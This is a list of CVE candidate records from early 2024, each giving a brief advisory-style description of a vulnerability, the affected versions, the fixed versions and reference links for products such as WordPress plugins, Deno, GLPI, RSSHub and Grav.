CVE    2024    27961    Candidate    Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Codekraft AntiSpam for Contact Form 7 allows Reflected XSS. This issue affects AntiSpam for Contact Form 7: from n/a through 0.6.0.    MISC:https://patchstack.com/database/vulnerability/cf7-antispam/wordpress-antispam-for-contact-form-7-plugin-0-6-0-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve   |   URL:https://patchstack.com/database/vulnerability/cf7-antispam/wordpress-antispam-for-contact-form-7-plugin-0-6-0-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve    Assigned (20240228)
CVE    2024    27960    Candidate    Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in I Thirteen Web Solution Email Subscription Popup allows Stored XSS. This issue affects Email Subscription Popup: from n/a through 1.2.20.    MISC:https://patchstack.com/database/vulnerability/email-subscribe/wordpress-email-subscription-popup-plugin-1-2-20-cross-site-scripting-xss-vulnerability?_s_id=cve   |   URL:https://patchstack.com/database/vulnerability/email-subscribe/wordpress-email-subscription-popup-plugin-1-2-20-cross-site-scripting-xss-vulnerability?_s_id=cve    Assigned (20240228)
CVE    2024    27959    Candidate    Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Wpexpertsio WC Shop Sync – Integrate Square and WooCommerce for Seamless Shop Management allows Reflected XSS. This issue affects WC Shop Sync – Integrate Square and WooCommerce for Seamless Shop Management: from n/a through 4.2.9.    MISC:https://patchstack.com/database/vulnerability/woosquare/wordpress-apiexperts-square-for-woocommerce-plugin-4-2-9-cross-site-scripting-xss-vulnerability?_s_id=cve   |   URL:https://patchstack.com/database/vulnerability/woosquare/wordpress-apiexperts-square-for-woocommerce-plugin-4-2-9-cross-site-scripting-xss-vulnerability?_s_id=cve    Assigned (20240228)
CVE    2024    27958    Candidate    Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Themeisle Visualizer allows Reflected XSS. This issue affects Visualizer: from n/a through 3.10.5.    MISC:https://patchstack.com/database/vulnerability/visualizer/wordpress-visualizer-plugin-3-10-5-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve   |   URL:https://patchstack.com/database/vulnerability/visualizer/wordpress-visualizer-plugin-3-10-5-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve    Assigned (20240228)
CVE    2024    27957    Candidate    Unrestricted Upload of File with Dangerous Type vulnerability in Pie Register. This issue affects Pie Register: from n/a through 3.8.3.1.    MISC:https://patchstack.com/database/vulnerability/pie-register/wordpress-pie-register-plugin-3-8-3-1-unauthenticated-arbitrary-file-upload-vulnerability?_s_id=cve   |   URL:https://patchstack.com/database/vulnerability/pie-register/wordpress-pie-register-plugin-3-8-3-1-unauthenticated-arbitrary-file-upload-vulnerability?_s_id=cve    Assigned (20240228)
CVE    2024    27956    Candidate    Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in ValvePress Automatic allows SQL Injection. This issue affects Automatic: from n/a through 3.92.0.    MISC:https://patchstack.com/database/vulnerability/wp-automatic/wordpress-automatic-plugin-3-92-0-unauthenticated-arbitrary-sql-execution-vulnerability?_s_id=cve   |   URL:https://patchstack.com/database/vulnerability/wp-automatic/wordpress-automatic-plugin-3-92-0-unauthenticated-arbitrary-sql-execution-vulnerability?_s_id=cve    Assigned (20240228)
CVE    2024    27953    Candidate    Missing Authorization vulnerability in Cool Plugins Cryptocurrency Widgets – Price Ticker & Coins List. This issue affects Cryptocurrency Widgets – Price Ticker & Coins List: from n/a through 2.6.8.    MISC:https://patchstack.com/database/vulnerability/cryptocurrency-price-ticker-widget/wordpress-cryptocurrency-widgets-plugin-2-6-8-broken-access-control-vulnerability?_s_id=cve   |   URL:https://patchstack.com/database/vulnerability/cryptocurrency-price-ticker-widget/wordpress-cryptocurrency-widgets-plugin-2-6-8-broken-access-control-vulnerability?_s_id=cve    Assigned (20240228)
CVE    2024    27952    Candidate    Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in WP Codeus Advanced Sermons allows Reflected XSS. This issue affects Advanced Sermons: from n/a through 3.2.    MISC:https://patchstack.com/database/vulnerability/advanced-sermons/wordpress-advanced-sermons-plugin-3-2-cross-site-scripting-xss-vulnerability?_s_id=cve   |   URL:https://patchstack.com/database/vulnerability/advanced-sermons/wordpress-advanced-sermons-plugin-3-2-cross-site-scripting-xss-vulnerability?_s_id=cve    Assigned (20240228)
CVE    2024    27950    Candidate    Missing Authorization vulnerability in sirv.Com Image Optimizer, Resizer and CDN – Sirv. This issue affects Image Optimizer, Resizer and CDN – Sirv: from n/a through 7.2.0.    MISC:https://patchstack.com/database/vulnerability/sirv/wordpress-sirv-plugin-7-2-0-broken-access-control-vulnerability?_s_id=cve   |   URL:https://patchstack.com/database/vulnerability/sirv/wordpress-sirv-plugin-7-2-0-broken-access-control-vulnerability?_s_id=cve    Assigned (20240228)
CVE    2024    27949    Candidate    Server-Side Request Forgery (SSRF) vulnerability in sirv.Com Image Optimizer, Resizer and CDN – Sirv. This issue affects Image Optimizer, Resizer and CDN – Sirv: from n/a through 7.2.0.    MISC:https://patchstack.com/database/vulnerability/sirv/wordpress-sirv-plugin-7-2-0-server-side-request-forgery-ssrf-vulnerability?_s_id=cve   |   URL:https://patchstack.com/database/vulnerability/sirv/wordpress-sirv-plugin-7-2-0-server-side-request-forgery-ssrf-vulnerability?_s_id=cve    Assigned (20240228)
CVE    2024    27948    Candidate    Cross-Site Request Forgery (CSRF) vulnerability in bytesforall Atahualpa. This issue affects Atahualpa: from n/a through 3.7.24.    MISC:https://patchstack.com/database/vulnerability/atahualpa/wordpress-atahualpa-theme-3-7-24-cross-site-request-forgery-csrf-vulnerability?_s_id=cve   |   URL:https://patchstack.com/database/vulnerability/atahualpa/wordpress-atahualpa-theme-3-7-24-cross-site-request-forgery-csrf-vulnerability?_s_id=cve    Assigned (20240228)
CVE    2024    27938    Candidate    Postal is an open source SMTP server. Postal versions less than 3.0.0 are vulnerable to SMTP Smuggling attacks which may allow incoming e-mails to be spoofed. This, in conjunction with a cooperative outgoing SMTP service, would allow for an incoming e-mail to be received by Postal addressed from a server that a user has 'authorised' to send mail on their behalf but were not the genuine author of the e-mail. Postal is not affected for sending outgoing e-mails as email is re-encoded with `<CR><LF>` line endings when transmitted over SMTP. This issue has been addressed and users should upgrade to Postal v3.0.0 or higher. Once upgraded, Postal will only accept End of DATA sequences which are explicitly `<CR><LF>.<CR><LF>`. If a non-compliant sequence is detected it will be logged to the SMTP server log. There are no workarounds for this issue.    MISC:https://github.com/postalserver/postal/commit/0140dc4   |   URL:https://github.com/postalserver/postal/commit/0140dc4   |   MISC:https://github.com/postalserver/postal/security/advisories/GHSA-j42r-6c99-hqf2   |   URL:https://github.com/postalserver/postal/security/advisories/GHSA-j42r-6c99-hqf2   |   MISC:https://sec-consult.com/blog/detail/smtp-smuggling-spoofing-e-mails-worldwide   |   URL:https://sec-consult.com/blog/detail/smtp-smuggling-spoofing-e-mails-worldwide   |   MISC:https://www.postfix.org/smtp-smuggling.html   |   URL:https://www.postfix.org/smtp-smuggling.html    Assigned (20240228)
CVE    2024    27937    Candidate    GLPI is a Free Asset and IT Management Software package, Data center management, ITIL Service Desk, licenses tracking and software auditing. An authenticated user can obtain the email address of all GLPI users. This issue has been patched in version 10.0.13.    MISC:https://github.com/glpi-project/glpi/commit/d02c537d23cbb729fe18b87f71b3c6e84e9892da   |   URL:https://github.com/glpi-project/glpi/commit/d02c537d23cbb729fe18b87f71b3c6e84e9892da   |   MISC:https://github.com/glpi-project/glpi/releases/tag/10.0.13   |   URL:https://github.com/glpi-project/glpi/releases/tag/10.0.13   |   MISC:https://github.com/glpi-project/glpi/security/advisories/GHSA-98qw-hpg3-2hpj   |   URL:https://github.com/glpi-project/glpi/security/advisories/GHSA-98qw-hpg3-2hpj    Assigned (20240228)
CVE    2024    27936    Candidate    Deno is a JavaScript, TypeScript, and WebAssembly runtime with secure defaults. Starting in version 1.32.1 and prior to version 1.41 of the deno_runtime library, a maliciously crafted permission request can show a spoofed permission prompt by inserting a broken ANSI escape sequence into the request contents. Deno strips any ANSI escape sequences from the permission prompt, but permissions given to the program are based on the contents that contain the ANSI escape sequences. Any Deno program can spoof the content of the interactive permission prompt by inserting a broken ANSI code, which allows a malicious Deno program to display the wrong file path or program name to the user. Version 1.41 of the deno_runtime library contains a patch for the issue.    MISC:https://github.com/denoland/deno/commit/78d430103a8f6931154ddbbe19d36f3b8630286d   |   URL:https://github.com/denoland/deno/commit/78d430103a8f6931154ddbbe19d36f3b8630286d   |   MISC:https://github.com/denoland/deno/commit/7e6b94231290020b55f1d08fb03ea8132781abc5   |   URL:https://github.com/denoland/deno/commit/7e6b94231290020b55f1d08fb03ea8132781abc5   |   MISC:https://github.com/denoland/deno/security/advisories/GHSA-m4pq-fv2w-6hrw   |   URL:https://github.com/denoland/deno/security/advisories/GHSA-m4pq-fv2w-6hrw    Assigned (20240228)
CVE    2024    27935    Candidate    Deno is a JavaScript, TypeScript, and WebAssembly runtime. Starting in version 1.35.1 and prior to version 1.36.3, a vulnerability in Deno's Node.js compatibility runtime allows for cross-session data contamination during simultaneous asynchronous reads from Node.js streams sourced from sockets or files. The issue arises from the re-use of a global buffer (BUF) in stream_wrap.ts used as a performance optimization to limit allocations during these asynchronous read operations. This can lead to data intended for one session being received by another session, potentially resulting in data corruption and unexpected behavior. This affects all users of Deno that use the node.js compatibility layer for network communication or other streams, including packages that may require node.js libraries indirectly. Version 1.36.3 contains a patch for this issue.    MISC:https://github.com/denoland/deno/commit/3e9fb8aafd9834ebacd27734cea4310caaf794c6   |   URL:https://github.com/denoland/deno/commit/3e9fb8aafd9834ebacd27734cea4310caaf794c6   |   MISC:https://github.com/denoland/deno/issues/20188   |   URL:https://github.com/denoland/deno/issues/20188   |   MISC:https://github.com/denoland/deno/security/advisories/GHSA-wrqv-pf6j-mqjp   |   URL:https://github.com/denoland/deno/security/advisories/GHSA-wrqv-pf6j-mqjp    Assigned (20240228)
CVE    2024    27934    Candidate    Deno is a JavaScript, TypeScript, and WebAssembly runtime. Starting in version 1.36.2 and prior to version 1.40.3, use of inherently unsafe `*const c_void` and `ExternalPointer` leads to use-after-free access of the underlying structure, resulting in arbitrary code execution. Use of inherently unsafe `*const c_void` and `ExternalPointer` leads to use-after-free access of the underlying structure, which is exploitable by an attacker controlling the code executed inside a Deno runtime to obtain arbitrary code execution on the host machine regardless of permissions. This bug is known to be exploitable for both `*const c_void` and `ExternalPointer` implementations. Version 1.40.3 fixes this issue.    MISC:https://github.com/denoland/deno/security/advisories/GHSA-3j27-563v-28wf   |   URL:https://github.com/denoland/deno/security/advisories/GHSA-3j27-563v-28wf    Assigned (20240228)
CVE    2024    27933    Candidate    Deno is a JavaScript, TypeScript, and WebAssembly runtime. In version 1.39.0, use of raw file descriptors in `op_node_ipc_pipe()` leads to premature close of arbitrary file descriptors, allowing standard input to be re-opened as a different resource resulting in permission prompt bypass. Node child_process IPC relies on the JS side to pass the raw IPC file descriptor to `op_node_ipc_pipe()`, which returns an `IpcJsonStreamResource` ID associated with the file descriptor. On closing the resource, the raw file descriptor is closed together. Use of raw file descriptors in `op_node_ipc_pipe()` leads to premature close of arbitrary file descriptors. This allows standard input (fd 0) to be closed and re-opened for a different resource, which allows a silent permission prompt bypass. This is exploitable by an attacker controlling the code executed inside a Deno runtime to obtain arbitrary code execution on the host machine regardless of permissions. This bug is known to be exploitable. There is a working exploit that achieves arbitrary code execution by bypassing prompts from zero permissions, additionally abusing the fact that Cache API lacks filesystem permission checks. The attack can be conducted silently as stderr can also be closed, suppressing all prompt outputs. Version 1.39.1 fixes the bug.    
MISC:https://github.com/denoland/deno/blob/v1.39.0/runtime/permissions/prompter.rs#L214   |   URL:https://github.com/denoland/deno/blob/v1.39.0/runtime/permissions/prompter.rs#L214   |   MISC:https://github.com/denoland/deno/blob/v1.39.0/runtime/permissions/prompter.rs#L220   |   URL:https://github.com/denoland/deno/blob/v1.39.0/runtime/permissions/prompter.rs#L220   |   MISC:https://github.com/denoland/deno/blob/v1.39.0/runtime/permissions/prompter.rs#L225   |   URL:https://github.com/denoland/deno/blob/v1.39.0/runtime/permissions/prompter.rs#L225   |   MISC:https://github.com/denoland/deno/blob/v1.39.0/runtime/permissions/prompter.rs#L241   |   URL:https://github.com/denoland/deno/blob/v1.39.0/runtime/permissions/prompter.rs#L241   |   MISC:https://github.com/denoland/deno/blob/v1.39.0/runtime/permissions/prompter.rs#L256   |   URL:https://github.com/denoland/deno/blob/v1.39.0/runtime/permissions/prompter.rs#L256   |   MISC:https://github.com/denoland/deno/blob/v1.39.0/runtime/permissions/prompter.rs#L265   |   URL:https://github.com/denoland/deno/blob/v1.39.0/runtime/permissions/prompter.rs#L265   |   MISC:https://github.com/denoland/deno/blob/v1.39.0/runtime/permissions/prompter.rs#L99   |   URL:https://github.com/denoland/deno/blob/v1.39.0/runtime/permissions/prompter.rs#L99   |   MISC:https://github.com/denoland/deno/commit/55fac9f5ead6d30996400e8597c969b675c5a22b   |   URL:https://github.com/denoland/deno/commit/55fac9f5ead6d30996400e8597c969b675c5a22b   |   MISC:https://github.com/denoland/deno/commit/5a91a065b882215dde209baf626247e54c21a392   |   URL:https://github.com/denoland/deno/commit/5a91a065b882215dde209baf626247e54c21a392   |   MISC:https://github.com/denoland/deno/security/advisories/GHSA-6q4w-9x56-rmwq   |   URL:https://github.com/denoland/deno/security/advisories/GHSA-6q4w-9x56-rmwq    Assigned (20240228)
CVE    2024    27932    Candidate    Deno is a JavaScript, TypeScript, and WebAssembly runtime. Starting in version 1.8.0 and prior to version 1.40.4, Deno improperly checks that an import specifier's hostname is equal to or a child of a token's hostname, which can cause tokens to be sent to servers they shouldn't be sent to. An auth token intended for `example[.]com` may be sent to `notexample[.]com`. Anyone who uses DENO_AUTH_TOKENS and imports potentially untrusted code is affected. Version 1.40.0 contains a patch for this issue    MISC:https://github.com/denoland/deno/blob/3f4639c330a31741b0efda2f93ebbb833f4f95bc/cli/auth_tokens.rs#L89   |   URL:https://github.com/denoland/deno/blob/3f4639c330a31741b0efda2f93ebbb833f4f95bc/cli/auth_tokens.rs#L89   |   MISC:https://github.com/denoland/deno/commit/de23e3b60b066481cc390f459497d5bef42a899b   |   URL:https://github.com/denoland/deno/commit/de23e3b60b066481cc390f459497d5bef42a899b   |   MISC:https://github.com/denoland/deno/security/advisories/GHSA-5frw-4rwq-xhcr   |   URL:https://github.com/denoland/deno/security/advisories/GHSA-5frw-4rwq-xhcr    Assigned (20240228)
CVE    2024    27931    Candidate    Deno is a JavaScript, TypeScript, and WebAssembly runtime with secure defaults. Insufficient validation of parameters in `Deno.makeTemp*` APIs would allow for creation of files outside of the allowed directories. This may allow the user to overwrite important files on the system that may affect other systems. A user may provide a prefix or suffix to a `Deno.makeTemp*` API containing path traversal characters. This is fixed in Deno 1.41.1.    MISC:https://github.com/denoland/deno/security/advisories/GHSA-hrqr-jv8w-v9jh   |   URL:https://github.com/denoland/deno/security/advisories/GHSA-hrqr-jv8w-v9jh    Assigned (20240228)
CVE    2024    27930    Candidate    GLPI is a Free Asset and IT Management Software package, Data center management, ITIL Service Desk, licenses tracking and software auditing. An authenticated user can access sensitive fields data from items on which he has read access. This issue has been patched in version 10.0.13.    MISC:https://github.com/glpi-project/glpi/commit/1942b70b2422fff51822f6eb3af500c94760871e   |   URL:https://github.com/glpi-project/glpi/commit/1942b70b2422fff51822f6eb3af500c94760871e   |   MISC:https://github.com/glpi-project/glpi/releases/tag/10.0.13   |   URL:https://github.com/glpi-project/glpi/releases/tag/10.0.13   |   MISC:https://github.com/glpi-project/glpi/security/advisories/GHSA-82vv-j9pr-qmwq   |   URL:https://github.com/glpi-project/glpi/security/advisories/GHSA-82vv-j9pr-qmwq    Assigned (20240228)
CVE    2024    27929    Candidate    ImageSharp is a managed, cross-platform, 2D graphics library. A heap-use-after-free flaw was found in ImageSharp's InitializeImage() function of PngDecoderCore.cs file. This vulnerability is triggered when an attacker passes a specially crafted PNG image file to ImageSharp for conversion, potentially leading to information disclosure. This issue has been patched in versions 3.1.3 and 2.1.7.    MISC:https://github.com/SixLabors/ImageSharp/security/advisories/GHSA-65x7-c272-7g7r   |   URL:https://github.com/SixLabors/ImageSharp/security/advisories/GHSA-65x7-c272-7g7r    Assigned (20240228)
CVE    2024    27927    Candidate    RSSHub is an open source RSS feed generator. Prior to version 1.0.0-master.a429472, RSSHub allows remote attackers to use the server as a proxy to send HTTP GET requests to arbitrary targets and retrieve information in the internal network or conduct Denial-of-Service (DoS) attacks. The attacker can send malicious requests to a RSSHub server, to make the server send HTTP GET requests to arbitrary destinations and see partial responses. This may lead to leak the server IP address, which could be hidden behind a CDN; retrieving information in the internal network, e.g. which addresses/ports are accessible, the titles and meta descriptions of HTML pages; and denial of service amplification. The attacker could request the server to download some large files, or chain several SSRF requests in a single attacker request.    MISC:https://github.com/DIYgod/RSSHub/blob/172f6cfd2b69ea6affdbdedf61e6dde1671f3796/lib/routes/m4/index.js#L10-L14   |   URL:https://github.com/DIYgod/RSSHub/blob/172f6cfd2b69ea6affdbdedf61e6dde1671f3796/lib/routes/m4/index.js#L10-L14   |   MISC:https://github.com/DIYgod/RSSHub/blob/172f6cfd2b69ea6affdbdedf61e6dde1671f3796/lib/routes/zjol/paper.js#L7-L13   |   URL:https://github.com/DIYgod/RSSHub/blob/172f6cfd2b69ea6affdbdedf61e6dde1671f3796/lib/routes/zjol/paper.js#L7-L13   |   MISC:https://github.com/DIYgod/RSSHub/blob/5928c5db2472e101c2f5c3bafed77a2f72edd40a/lib/routes/mastodon/acct.js#L4-L7   |   URL:https://github.com/DIYgod/RSSHub/blob/5928c5db2472e101c2f5c3bafed77a2f72edd40a/lib/routes/mastodon/acct.js#L4-L7   |   MISC:https://github.com/DIYgod/RSSHub/blob/5928c5db2472e101c2f5c3bafed77a2f72edd40a/lib/routes/mastodon/utils.js#L85-L105   |   URL:https://github.com/DIYgod/RSSHub/blob/5928c5db2472e101c2f5c3bafed77a2f72edd40a/lib/routes/mastodon/utils.js#L85-L105   |   MISC:https://github.com/DIYgod/RSSHub/commit/a42947231104a9ec3436fc52cedb31740c9a7069   |   
URL:https://github.com/DIYgod/RSSHub/commit/a42947231104a9ec3436fc52cedb31740c9a7069   |   MISC:https://github.com/DIYgod/RSSHub/security/advisories/GHSA-3p3p-cgj7-vgw3   |   URL:https://github.com/DIYgod/RSSHub/security/advisories/GHSA-3p3p-cgj7-vgw3    Assigned (20240228)
CVE    2024    27926    Candidate    RSSHub is an open source RSS feed generator. Starting in version 1.0.0-master.cbbd829 and prior to version 1.0.0-master.d8ca915, when the specially crafted image is supplied to the internal media proxy, it proxies the image without handling XSS vulnerabilities, allowing for the execution of arbitrary JavaScript code. Users who access the deliberately constructed URL are affected. This vulnerability was fixed in version 1.0.0-master.d8ca915. No known workarounds are available.    MISC:https://github.com/DIYgod/RSSHub/commit/4d3e5d79c1c17837e931b4cd253d2013b487aa87   |   URL:https://github.com/DIYgod/RSSHub/commit/4d3e5d79c1c17837e931b4cd253d2013b487aa87   |   MISC:https://github.com/DIYgod/RSSHub/security/advisories/GHSA-2wqw-hr4f-xrhh   |   URL:https://github.com/DIYgod/RSSHub/security/advisories/GHSA-2wqw-hr4f-xrhh    Assigned (20240228)
CVE    2024    27923    Candidate    Grav is a content management system (CMS). Prior to version 1.7.43, users who may write a page may use the `frontmatter` feature due to insufficient permission validation and inadequate file name validation. This may lead to remote code execution. Version 1.7.43 fixes this issue.    MISC:https://github.com/getgrav/grav/commit/e3b0aa0c502aad251c1b79d1ee973dcd93711f07   |   URL:https://github.com/getgrav/grav/commit/e3b0aa0c502aad251c1b79d1ee973dcd93711f07   |   MISC:https://github.com/getgrav/grav/security/advisories/GHSA-f6g2-h7qv-3m5v   |   URL:https://github.com/getgrav/grav/security/advisories/GHSA-f6g2-h7qv-3m5v    Assigned (20240228)
CVE    2024    27922    Candidate    TOMP Bare Server implements the TompHTTP bare server. A vulnerability in versions prior to 2.0.2 relates to insecure handling of HTTP requests by the @tomphttp/bare-server-node package. This flaw potentially exposes the users of the package to manipulation of their web traffic. The impact may vary depending on the specific usage of the package but it can potentially affect any system where this package is in use. The problem has been patched in version 2.0.2. As of time of publication, no specific workaround strategies have been disclosed.    MISC:https://github.com/tomphttp/bare-server-node/security/advisories/GHSA-86fc-f9gr-v533   |   URL:https://github.com/tomphttp/bare-server-node/security/advisories/GHSA-86fc-f9gr-v533    Assigned (20240228)
CVE    2024    27921    Candidate    Grav is an open-source, flat-file content management system. A file upload path traversal vulnerability has been identified in the application prior to version 1.7.45, enabling attackers to replace or create files with extensions like .json, .zip, .css, .gif, etc. This critical security flaw poses severe risks, that can allow attackers to inject arbitrary code on the server, undermine integrity of backup files by overwriting existing files or creating new ones, and exfiltrate sensitive data using CSS exfiltration techniques. Upgrading to patched version 1.7.45 can mitigate the issue.    MISC:https://github.com/getgrav/grav/commit/5928411b86bab05afca2b33db4e7386a44858e99   |   URL:https://github.com/getgrav/grav/commit/5928411b86bab05afca2b33db4e7386a44858e99   |   MISC:https://github.com/getgrav/grav/security/advisories/GHSA-m7hx-hw6h-mqmc   |   URL:https://github.com/getgrav/grav/security/advisories/GHSA-m7hx-hw6h-mqmc    Assigned (20240228)
CVE    2024    27920    Candidate    projectdiscovery/nuclei is a fast and customisable vulnerability scanner based on simple YAML based DSL. A significant security oversight was identified in Nuclei v3, involving the execution of unsigned code templates through workflows. This vulnerability specifically affects users utilizing custom workflows, potentially allowing the execution of malicious code on the user's system. This advisory outlines the impacted users, provides details on the security patch, and suggests mitigation strategies. The vulnerability is addressed in Nuclei v3.2.0. Users are strongly recommended to update to this version to mitigate the security risk. Users should refrain from using custom workflows if unable to upgrade immediately. Only trusted, verified workflows should be executed.    MISC:https://docs.projectdiscovery.io/templates/protocols/code   |   URL:https://docs.projectdiscovery.io/templates/protocols/code   |   MISC:https://docs.projectdiscovery.io/templates/reference/template-signing   |   URL:https://docs.projectdiscovery.io/templates/reference/template-signing   |   MISC:https://docs.projectdiscovery.io/templates/workflows/overview   |   URL:https://docs.projectdiscovery.io/templates/workflows/overview   |   MISC:https://github.com/projectdiscovery/nuclei/pull/4822   |   URL:https://github.com/projectdiscovery/nuclei/pull/4822   |   MISC:https://github.com/projectdiscovery/nuclei/security/advisories/GHSA-w5wx-6g2r-r78q   |   URL:https://github.com/projectdiscovery/nuclei/security/advisories/GHSA-w5wx-6g2r-r78q    Assigned (20240228)
CVE    2024    27918    Candidate    Coder allows organizations to provision remote development environments via Terraform. Prior to versions 2.6.1, 2.7.3, and 2.8.4, a vulnerability in Coder's OIDC authentication could allow an attacker to bypass the `CODER_OIDC_EMAIL_DOMAIN` verification and create an account with an email not in the allowlist. Deployments are only affected if the OIDC provider allows users to create accounts on the provider. During OIDC registration, the user's email was improperly validated against the allowed `CODER_OIDC_EMAIL_DOMAIN`s. This could allow a user with a domain that only partially matched an allowed domain to successfully login or register. An attacker could register a domain name that exploited this vulnerability and register on a Coder instance with a public OIDC provider. Coder instances with OIDC enabled and protected by the `CODER_OIDC_EMAIL_DOMAIN` configuration are affected. Coder instances using a private OIDC provider are not affected, as arbitrary users cannot register through a private OIDC provider without first having an account on the provider. Public OIDC providers are impacted. GitHub authentication and external authentication are not impacted. This vulnerability is remedied in versions 2.8.4, 2.7.3, and 2.6.1. All versions prior to these patches are affected by the vulnerability. It is recommended that customers upgrade their deployments as soon as possible if they are utilizing OIDC authentication with the `CODER_OIDC_EMAIL_DOMAIN` setting.    
MISC:https://github.com/coder/coder/commit/1171ce7add017481d28441575024209ac160ecb0   |   URL:https://github.com/coder/coder/commit/1171ce7add017481d28441575024209ac160ecb0   |   MISC:https://github.com/coder/coder/commit/2ba84911f8b02605e5958d5e4a2fe3979ec50b31   |   URL:https://github.com/coder/coder/commit/2ba84911f8b02605e5958d5e4a2fe3979ec50b31   |   MISC:https://github.com/coder/coder/commit/2d37eb42e7db656e343fe1f36de5ab1a1a62f4fb   |   URL:https://github.com/coder/coder/commit/2d37eb42e7db656e343fe1f36de5ab1a1a62f4fb   |   MISC:https://github.com/coder/coder/commit/4439a920e454a82565e445e4376c669e3b89591c   |   URL:https://github.com/coder/coder/commit/4439a920e454a82565e445e4376c669e3b89591c   |   MISC:https://github.com/coder/coder/security/advisories/GHSA-7cc2-r658-7xpf   |   URL:https://github.com/coder/coder/security/advisories/GHSA-7cc2-r658-7xpf    Assigned (20240228)
CVE    2024    27917    Candidate    Shopware is an open commerce platform based on Symfony Framework and Vue. The Symfony Session Handler pops the Session Cookie and assigns it to the Response. Since Shopware 6.5.8.0, the 404 pages are cached to improve the performance of 404 pages. So the cached Response which contains a Session Cookie when the Browser accessing the 404 page, has no cookies yet. The Symfony Session Handler is in use, when no explicit Session configuration has been done. When Redis is in use for Sessions using the PHP Redis extension, this exploiting code is not used. Shopware version 6.5.8.7 contains a patch for this issue. As a workaround, use Redis for Sessions, as this does not trigger the exploit code.    MISC:https://github.com/shopware/shopware/commit/7d9cb03225efca5f97e69b800d8747598dd15ce3   |   URL:https://github.com/shopware/shopware/commit/7d9cb03225efca5f97e69b800d8747598dd15ce3   |   MISC:https://github.com/shopware/shopware/releases/tag/v6.5.8.7   |   URL:https://github.com/shopware/shopware/releases/tag/v6.5.8.7   |   MISC:https://github.com/shopware/shopware/security/advisories/GHSA-c2f9-4jmm-v45m   |   URL:https://github.com/shopware/shopware/security/advisories/GHSA-c2f9-4jmm-v45m   |   MISC:https://github.com/shopware/storefront/commit/3477e4a425d3c54b4bfae82d703fe3838dc21d3e   |   URL:https://github.com/shopware/storefront/commit/3477e4a425d3c54b4bfae82d703fe3838dc21d3e    Assigned (20240228)
CVE    2024    27916    Candidate    Minder is a software supply chain security platform. Prior to version 0.0.33, a Minder user can use the endpoints `GetRepositoryByName`, `DeleteRepositoryByName`, and `GetArtifactByName` to access any repository in the database, irrespective of who owns the repo and any permissions present. The database query checks by repo owner, repo name and provider name (which is always `github`). These query values are not distinct for the particular user - as long as the user has valid credentials and a provider, they can set the repo owner/name to any value they want and the server will return information on this repo. Version 0.0.33 contains a patch for this issue.    MISC:https://github.com/stacklok/minder/blob/a115c8524fbd582b2b277eaadce024bebbded508/internal/controlplane/handlers_repositories.go#L277-L278   |   URL:https://github.com/stacklok/minder/blob/a115c8524fbd582b2b277eaadce024bebbded508/internal/controlplane/handlers_repositories.go#L277-L278   |   MISC:https://github.com/stacklok/minder/blob/main/internal/controlplane/handlers_repositories.go#L257-L299   |   URL:https://github.com/stacklok/minder/blob/main/internal/controlplane/handlers_repositories.go#L257-L299   |   MISC:https://github.com/stacklok/minder/commit/45750b4e9fb2de33365758366e06c19e999bd2eb   |   URL:https://github.com/stacklok/minder/commit/45750b4e9fb2de33365758366e06c19e999bd2eb   |   MISC:https://github.com/stacklok/minder/security/advisories/GHSA-v627-69v2-xx37   |   URL:https://github.com/stacklok/minder/security/advisories/GHSA-v627-69v2-xx37    Assigned (20240228)
CVE    2024    27915    Candidate    Sulu is a PHP content management system. Starting in version 2.2.0 and prior to version 2.4.17 and 2.5.13, access to pages is granted regardless of role permissions for webspaces which have a security system configured and permission check enabled. Webspaces without do not have this issue. The problem is patched in versions 2.4.17 and 2.5.13. Some workarounds are available. One may apply the patch to `vendor/symfony/security-http/HttpUtils.php` manually or avoid installing `symfony/security-http` versions greater than or equal to `v5.4.30` or `v6.3.6`.    MISC:https://github.com/sulu/sulu/commit/ec9c3f99e15336dc4f6877f512300f231c17c6da   |   URL:https://github.com/sulu/sulu/commit/ec9c3f99e15336dc4f6877f512300f231c17c6da   |   MISC:https://github.com/sulu/sulu/security/advisories/GHSA-jr83-m233-gg6p   |   URL:https://github.com/sulu/sulu/security/advisories/GHSA-jr83-m233-gg6p    Assigned (20240228)
CVE    2024    27914    Candidate    GLPI is a Free Asset and IT Management Software package, Data center management, ITIL Service Desk, licenses tracking and software auditing. An unauthenticated user can provide a malicious link to a GLPI administrator in order to exploit a reflected XSS vulnerability. The XSS will only trigger if the administrator navigates through the debug bar. This issue has been patched in version 10.0.13.    MISC:https://github.com/glpi-project/glpi/commit/69e0dee8de0c0df139b42dbfa1a8997888c2af95   |   URL:https://github.com/glpi-project/glpi/commit/69e0dee8de0c0df139b42dbfa1a8997888c2af95   |   MISC:https://github.com/glpi-project/glpi/releases/tag/10.0.13   |   URL:https://github.com/glpi-project/glpi/releases/tag/10.0.13   |   MISC:https://github.com/glpi-project/glpi/security/advisories/GHSA-rcxj-fqr4-q34r   |   URL:https://github.com/glpi-project/glpi/security/advisories/GHSA-rcxj-fqr4-q34r    Assigned (20240228)
CVE    2024    27913    Candidate    ospf_te_parse_te in ospfd/ospf_te.c in FRRouting (FRR) through 9.1 allows remote attackers to cause a denial of service (ospfd daemon crash) via a malformed OSPF LSA packet, because of an attempted access to a missing attribute field.    MISC:https://github.com/FRRouting/frr/pull/15431    Assigned (20240228)
CVE    2024    27907    Candidate    A vulnerability has been identified in Simcenter Femap (All versions < V2306.0000). The affected application contains an out of bounds write past the end of an allocated buffer while parsing a specially crafted Catia MODEL file. This could allow an attacker to execute code in the context of the current process. (ZDI-CAN-22051)    MISC:https://cert-portal.siemens.com/productcert/html/ssa-000072.html   |   URL:https://cert-portal.siemens.com/productcert/html/ssa-000072.html    Assigned (20240227)
